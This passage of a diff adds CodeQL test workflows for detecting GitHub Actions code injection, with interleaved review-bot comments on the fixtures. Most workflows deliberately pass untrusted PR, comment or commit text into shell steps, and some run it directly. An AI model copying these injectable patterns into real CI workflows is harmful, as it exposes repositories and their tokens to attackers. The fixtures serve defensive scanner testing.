+ toppings-for-realz:
+ runs-on: ubuntu-latest
+ timeout-minutes: 1
+ if: github.event_name == 'workflow_run' && github.event.workflow_run.event == 'pull_request'
+ permissions:
+ id-token: write
+ contents: write
+ pull-requests: write
+ env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ: ${{ secrets.FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ }}
+ steps:
+ - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0
+ with:
+ egress-policy: audit
+ - uses: actions/first-interaction@v1
+ with:
+ repo-token: ${{ secrets.GITHUB_TOKEN }}
+ issue-message: 'Message that will be displayed on users first issue'
+ pr-message: 'Message that will be displayed on users first pr'
+ - name: Log test executions
+ run: |
+ echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information."
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml
new file mode 100644
index 000000000000..30672ecaaa70
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml
@@ -0,0 +1,42 @@ +name: "CodeQL Auto Language" + +on: + push: + branches: [ main ] + pull_request: + branches: [ main ] + schedule: + - cron: '17 19 * * 6' + +jobs: + create-matrix: + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.set-matrix.outputs.all_changed_files }} + steps: + - name: Get changed files + id: set-matrix + uses: tj-actions/changed-files@v40 + + analyze: + needs: create-matrix + if: ${{ needs.create-matrix.outputs.matrix != '[]' }} + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: ${{ fromJSON(needs.create-matrix.outputs.matrix) }} + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + + # Initializes the CodeQL tools for scanning. + - run: | + ${{ matrix.language }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml new file mode 100644 index 000000000000..1093ddd3c4c1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml @@ -0,0 +1,29 @@ +name: Matrix Flow + +on: + pull_request_target: + +jobs: + lookup: + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.filelist.outputs.file_names }} + steps: + - uses: actions/checkout@v2 + - name: Get all zip files + id: filelist + uses: the-coding-turtle/ga-file-list@v0.1 + with: + directory: "." + file_extension: "zip" + + multi_tenant: + needs: lookup + runs-on: ubuntu-latest + strategy: + matrix: + tenant: ${{fromJson(needs.lookup.outputs.matrix)}} + steps: + - name: Show all files + run: | + echo "this is file: ${{ matrix.TENANT }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml new file mode 100644 index 000000000000..d178464f96b9 --- /dev/null 
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml
@@ -0,0 +1,20 @@
+on: push
+
+jobs:
+ simple1:
+ runs-on: ubuntu-latest
+
+ steps:
+ - id: source
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ github.event.head_commit.message }}
+ find: 'foo'
+ replace: ''
+ - id: no-step
+ run: echo "test=foo" >> "$GITHUB_OUTPUT"
+ - id: sink
+ run: |
+ echo "echo ${{steps.no-step.outputs.foo}}"
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml
new file mode 100644
index 000000000000..429d4650b60d
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml
@@ -0,0 +1,37 @@
+name: CI
+
+on:
+ pull_request:
+ branches:
+ - main
+
+jobs:
+ changed_files:
+ runs-on: ubuntu-latest
+ name: Test changed-files
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ fetch-depth: 0
+
+ - name: Get changed files
+ id: source
+ uses: tj-actions/changed-files@v40
+
+ - name: Remove foo from changed files
+ id: step
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: 'foobarfoo'
+ find: 'foo'
+ replace: ''
+
+ - name: List all changed files
+ id: sink
+ run: |
+ for file in ${{ steps.step.outputs.value }}; do
+ echo "$file was changed"
+ done
+
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml
new file mode 100644
index 000000000000..9012eda26492
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml
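Review bot: The sink in no-flow1.yml reads `steps.no-step.outputs.foo`, but the `no-step` step only writes `test=foo` to `$GITHUB_OUTPUT`, so no output named `foo` exists; the fixture relies on the reader spotting that mismatch to understand why no flow is expected. A comment on the sink step, `# no-step sets output 'test', not 'foo': nothing reaches this sink`, would make the negative case explicit. The same applies to no-flow2.yml on this line, where `source: 'foobarfoo'` is a constant rather than `steps.source.outputs.all_changed_files` and deserves a similar one-line comment.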
@@ -0,0 +1,20 @@
+# It consumes an artifact produced by the First Workflow
+
+on: workflow_run
+jobs:
+ my-second-job:
+ runs-on: ubuntu-latest
+ steps:
+ - name: download pr artifact
+ uses: dawidd6/action-download-artifact@v2
+ with:
+ workflow: ${{github.event.workflow_run.workflow_id}}
+ run_id: ${{github.event.workflow_run.id}}
+ name: artifact
+
+ - id: version
+ run: |
+ echo "version=10" >> "${GITHUB_OUTPUT}"
+ ls
+ - run: echo ${{ steps.version.outputs.version }}
+
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml
new file mode 100644
index 000000000000..e2479e90636d
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml
@@ -0,0 +1,14 @@
+on: pull_request_target
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - id: version
+ run: |
+ echo "version=10" >> "${GITHUB_OUTPUT}"
+ ls
+ - run: echo ${{ steps.version.outputs.version }}
+
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml
new file mode 100644
index 000000000000..560e69f9e4b0
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml
@@ -0,0 +1,14 @@
+name: Privileged (only when local) pull request
+
+on:
+ pull_request:
+
+permissions:
+ pull-requests: write
+ contents: write
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "${{ github.event.pull_request.body }}"
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml
new file mode 100644
index 000000000000..d4ce78856694
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml
@@ -0,0 +1,14 @@
+on: pull_request_review
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.pull_request.title }}'
+ - run: echo '${{ github.event.pull_request.body }}'
+ - run: echo '${{ github.event.pull_request.head.label }}'
+ - run: echo '${{ github.event.pull_request.head.repo.default_branch }}'
+ - run: echo '${{ github.event.pull_request.head.repo.description }}'
+ - run: echo '${{ github.event.pull_request.head.repo.homepage }}'
+ - run: echo '${{ github.event.pull_request.head.ref }}'
+ - run: echo '${{ github.event.review.body }}'
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml
new file mode 100644
index 000000000000..5d288caad85d
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml
@@ -0,0 +1,14 @@
+on: pull_request_review_comment
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.pull_request.title }}'
+ - run: echo '${{ github.event.pull_request.body }}'
+ - run: echo '${{ github.event.pull_request.head.label }}'
+ - run: echo '${{ github.event.pull_request.head.repo.default_branch }}'
+ - run: echo '${{ github.event.pull_request.head.repo.description }}'
+ - run: echo '${{ github.event.pull_request.head.repo.homepage }}'
+ - run: echo '${{ github.event.pull_request.head.ref }}'
+ - run: echo '${{ github.event.comment.body }}'
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml
new file mode 100644
index 000000000000..4ca3753f50cd
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml
@@ -0,0 +1,17 @@
+on: pull_request_target
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, so we should not report it
+ - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, so we should not report it
+ - run: echo '${{ github.event.pull_request.title }}'
+ - run: echo '${{ github.event.pull_request.body }}'
+ - run: echo '${{ github.event.pull_request.head.label }}'
+ - run: echo '${{ github.event.pull_request.head.repo.default_branch }}'
+ - run: echo '${{ github.event.pull_request.head.repo.description }}'
+ - run: echo '${{ github.event.pull_request.head.repo.homepage }}'
+ - run: echo '${{ github.event.pull_request.head.ref }}'
+ - run: echo '${{ github.head_ref }}'
+
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml
new file mode 100644
index 000000000000..2006a7999daf
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml
@@ -0,0 +1,16 @@
+on: push
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.commits[11].message }}'
+ - run: echo '${{ github.event.commits[11].author.email }}'
+ - run: echo '${{ github.event.commits[11].author.name }}'
+ - run: echo '${{ github.event.head_commit.message }}'
+ - run: echo '${{ github.event.head_commit.author.email }}'
+ - run: echo '${{ github.event.head_commit.author.name }}'
+ - run: echo '${{ github.event.head_commit.committer.email }}'
+ - run: echo '${{ github.event.head_commit.committer.name }}'
+ - run: echo '${{ github.event.commits[11].committer.email }}'
+ - run: echo '${{ github.event.commits[11].committer.name }}'
\ No newline at end of file
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml new file mode 100644 index 000000000000..0c4aa93c7a58 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml 
@@ -0,0 +1,95 @@ +name: changelog + +on: + workflow_call: + inputs: + taint: + description: taint + type: string + required: true + default: "" + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - run: echo "${{ inputs.taint }}" + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = 
content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml new file mode 100644 index 000000000000..0c4aa93c7a58 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml 
@@ -0,0 +1,95 @@ +name: changelog + +on: + workflow_call: + inputs: + taint: + description: taint + type: string + required: true + default: "" + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - run: echo "${{ inputs.taint }}" + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = 
content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml new file mode 100644 index 000000000000..a237856b6ce7 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -0,0 +1,11 @@ +name: Caller + +on: + pull_request_target: + +jobs: + test: + permissions: {} + uses: ./.github/workflows/reusable-workflow-1.yml + with: + taint: ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml new file mode 100644 index 000000000000..0f87d1e9394f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -0,0 +1,10 @@ +name: Caller + +on: + pull_request_target: + +jobs: + test: + uses: ./.github/workflows/reusable-workflow-2.yml + with: + taint: ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml new file mode 100644 index 000000000000..39dfafcf023e --- /dev/null 
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml
@@ -0,0 +1,10 @@
+name: Caller
+
+on:
+ pull_request_target:
+
+jobs:
+ test:
+ uses: TestOrg/TestRepo/.github/workflows/reusable-workflow.yml@main
+ with:
+ taint: ${{ github.event.pull_request.title }}
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml
new file mode 100644
index 000000000000..9992fd8e4cbd
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml
@@ -0,0 +1,20 @@
+name: Test
+
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ test1:
+ runs-on: ubuntu-22.04
+ outputs:
+ job_output: ${{ steps.source.outputs.value }}
+ steps:
+ - id: source
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ github.event['comment']['body'] }}
+ find: 'foo'
+ replace: ''
+ - run: ${{ steps.source.outputs.value }}
+ - run: ${{ needs.test1.outputs.job_output }}
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml
new file mode 100644
index 000000000000..94e8be89bdc6
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml
@@ -0,0 +1,19 @@
+on: push
+
+jobs:
+ simple1:
+ runs-on: ubuntu-latest
+
+ steps:
+ - id: summary
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ github.event.head_commit.message }}
+ find: 'foo'
+ replace: ''
+ - id: flow
+ run: |
+ echo "${{steps.summary.outputs.value}}"
+ - id: no-flow
+ run: |
+ echo "${{steps.summary.outputs.foo}}"
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml
new file mode 100644
index 000000000000..8271f93d857f
--- /dev/null
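Review bot: In self_needs.yml the last step of job `test1` reads `needs.test1.outputs.job_output` from inside `test1` itself; the `needs` context only holds jobs listed under the current job's own `needs`, so that expression resolves to empty at runtime, and the fixture presumably exists to check that the query does not propagate `steps.source.outputs.value` through a self-reference. Without a comment the line reads as a typo that a future cleanup might "fix" into `job2`, silently changing what the test covers. Suggested comment above it: `# intentional self-reference: needs never contains the current job, so no flow from steps.source is expected here`.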
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml
@@ -0,0 +1,39 @@
+name: CI
+
+on: [pull_request_target, pull_request]
+
+jobs:
+ changed_files:
+ runs-on: ubuntu-latest
+ name: Test changed-files
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ fetch-depth: 0
+
+ - name: Get changed files
+ id: source
+ uses: tj-actions/changed-files@v40
+
+ - name: Remove foo from changed files
+ id: step
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ steps.source.outputs.all_changed_files }}
+ find: 'foo'
+ replace: ''
+
+ - name: List all changed files
+ id: sink
+ run: |
+ for file in ${{ steps.step.outputs.value }}; do
+ echo "$file was changed"
+ done
+
+ - name: List all changed files
+ id: no-flow
+ run: |
+ for file in ${{ steps.source.outputs.all_changed_files_count }}; do
+ echo "$file was changed"
+ done
+
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml
new file mode 100644
index 000000000000..3128aacc93ce
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml
@@ -0,0 +1,23 @@
+on:
+ workflow_run:
+ workflows:
+ - 'prev'
+ types:
+ - completed
+
+permissions:
+ actions: read
+ checks: read
+ contents: write
+
+jobs:
+ echo_trigger:
+ name: Report changes
+ runs-on: ubuntu-latest
+ steps:
+ - name: Echo trigger
+ run: |
+ echo "head branch: ${{ github.event.workflow_run.head_branch }}"
+ cat << EOF
+ ${{ toJSON(github.event) }}
+ EOF
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml
new file mode 100644
index 000000000000..adca4bc90ffa
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml
@@ -0,0 +1,21 @@
+name: Test
+on: issue_comment
+permissions:
+ issues: write
+
+jobs:
+ test:
+ if: startsWith(github.event.comment.body, '/benchmark')
+ runs-on: benchmarks
+ steps:
+ - name: Check for Command
+ id: command
+ uses: xt0rted/slash-command-action@v2
+ with:
+ command: benchmark
+ reaction-type: "eyes"
+ repo-token: ${{ env.GH_TOKEN }}
+
+ - run: echo "${{ steps.command.outputs.command-arguments }}"
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml
new file mode 100644
index 000000000000..5422ac4e9876
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml
@@ -0,0 +1,21 @@
+name: Test
+on: issue_comment
+permissions:
+ issues: write
+
+jobs:
+ test:
+ if: startsWith(github.event.comment.body, '/benchmark')
+ runs-on: benchmarks
+ steps:
+ - name: Check for Command
+ id: command
+ uses: xt0rted/slash-command-action@v2
+ with:
+ command: benchmark
+ reaction-type: "eyes"
+ repo-token: ${{ env.GH_TOKEN }}
+ permission-level: read
+
+ - run: echo "${{ steps.command.outputs.command-arguments }}"
+
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml
new file mode 100644
index 000000000000..7dc735dd6bcc
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml
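Review bot: slash_command1.yml and slash_command2.yml differ by a single line, `permission-level: read` on the `xt0rted/slash-command-action` step, and neither file says what that difference is meant to prove for the `echo "${{ steps.command.outputs.command-arguments }}"` sink; both also pass `repo-token: ${{ env.GH_TOKEN }}` although no `GH_TOKEN` is defined in either file, which is harmless for a static fixture but worth a remark so it is not mistaken for a missing `env:` block. If the intent is that `permission-level: read` leaves the verdict unchanged (read access is held by every user of a public repository), a header such as `# variant of slash_command1.yml: permission-level: read is not an effective gate; sink expected unchanged` would record that expectation next to the fixture rather than only in the .expected file.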
@@ -0,0 +1,71 @@
+name: Sonar Code Coverage Upload
+on:
+ workflow_run:
+ workflows: ["Build/Test"]
+ types: [completed]
+jobs:
+ sonar:
+ name: Sonar
+ runs-on: ubuntu-latest
+ if: github.event.workflow_run.conclusion == 'success'
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.workflow_run.head_repository.full_name }}
+ ref: ${{ github.event.workflow_run.head_branch }}
+ fetch-depth: 0
+ - name: 'Download code coverage'
+ uses: actions/github-script@v7
+ with:
+ script: |
+ let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: context.payload.workflow_run.id,
+ });
+ let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == "oc-code-coverage"
+ })[0];
+ let download = await github.rest.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ let fs = require('fs');
+ fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data));
+ - name: 'Unzip code coverage'
+ run: unzip oc-code-coverage.zip -d coverage
+ - name: set env vars
+ run: |
+ echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV
+ echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV
+ echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV
+ # on develop branch, only run a baseline scan
+ - name: SonarCloud Scan (Baseline)
+ uses: sonarsource/sonarcloud-github-action@master
+ if: env.SONAR_HEAD == 'develop'
+ env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
+ with:
+ args: >
+ -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }}
+ -Dsonar.projectKey=opencost_opencost
+ -Dsonar.organization=opencost
+ -Dsonar.branch.name=develop
+ -Dsonar.branch.target=develop
+ - name: SonarCloud Scan (PR)
+ uses: sonarsource/sonarcloud-github-action@master
+ if:
env.SONAR_HEAD != 'develop'
+ env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
+ with:
+ args: >
+ -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }}
+ -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }}
+ -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }}
+ -Dsonar.pullrequest.base=${{ env.SONAR_BASE }}
+ -Dsonar.projectKey=opencost_opencost
+ -Dsonar.organization=opencost
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml
new file mode 100644
index 000000000000..5aeb9aac7c52
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml
@@ -0,0 +1,52 @@
+on:
+ pull_request_target:
+
+permissions:
+ actions: write
+
+jobs:
+ job1:
+ runs-on: ubuntu-latest
+ outputs:
+ job_output: ${{ steps.step5.outputs.MSG5 }}
+
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ - id: step0
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ github.event['pull_request']['body'] }}
+ find: 'foo'
+ replace: ''
+ - id: step1
+ env:
+ BODY: ${{ steps.step0.outputs.value}}
+ run: echo "::set-output name=MSG::${BODY}"
+ - id: step2
+ env:
+ MSG: ${{steps.step1.outputs.MSG}}
+ run: echo "MSG2=$MSG" >> "$GITHUB_OUTPUT"
+ - id: step3
+ env:
+ MSG2: ${{steps.step2.outputs.MSG2}}
+ run: echo "MSG3=$MSG2" >> "${GITHUB_OUTPUT}"
+ - id: step4
+ env:
+ MSG3: ${{steps.step3.outputs.MSG3}}
+ run: echo "MSG4=$MSG3" >> ${GITHUB_OUTPUT}
+ - id: step5
+ env:
+ MSG4: ${{steps.step4.outputs.MSG4}}
+ run: echo "MSG5=$MSG4" >> $GITHUB_OUTPUT
+
+ job2:
+ runs-on: ubuntu-latest
+
+ if: ${{ always() }}
+
+ needs: job1
+
+ steps:
+ - run: echo ${{needs.job1.outputs['job_output']}}
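Review bot: sonar-source.yml checks out `github.event.workflow_run.head_repository.full_name` at `head_branch` in a `workflow_run` job that later receives `secrets.SONAR_TOKEN`, and pins `sonarsource/sonarcloud-github-action@master` twice; as a fixture reproducing a real-world pattern this is presumably deliberate, but nothing in the file says which expression the test treats as the source — the checkout inputs, `head_branch`, or the `SONAR_PR_NUM` / `SONAR_BASE` / `SONAR_HEAD` values read out of the downloaded artifact with `cat coverage/*.txt` and written to `$GITHUB_ENV` before they reach the `if:` conditions and the `-Dsonar.pullrequest.*` arguments. A header comment naming the intended source/sink pair, and stating that the mutable `@master` pin is part of the reproduced pattern rather than an oversight, would keep the case self-explaining, e.g. `# reproduces a workflow_run job that consumes artifact contents from the triggering run; see .expected for the reported flow`.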
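Review bot: In test.yml, `step1` writes its output with the deprecated `::set-output` workflow command while `step2` through `step5` use four spellings of the `$GITHUB_OUTPUT` redirect; that looks intentional (one chain covering every output-writing form the query must recognise), but nothing says so, and a future cleanup that normalises `step1` would silently narrow the test. A comment above `step1` such as `# step1 deliberately uses the deprecated ::set-output command; steps 2-5 cover the $GITHUB_OUTPUT spellings` would pin that intent. The same applies to `job2`'s `if: ${{ always() }}`, which is presumably there so the `needs.job1.outputs['job_output']` sink is evaluated regardless of job1's result.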
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml
new file mode 100644
index 000000000000..d149df2bd7ca
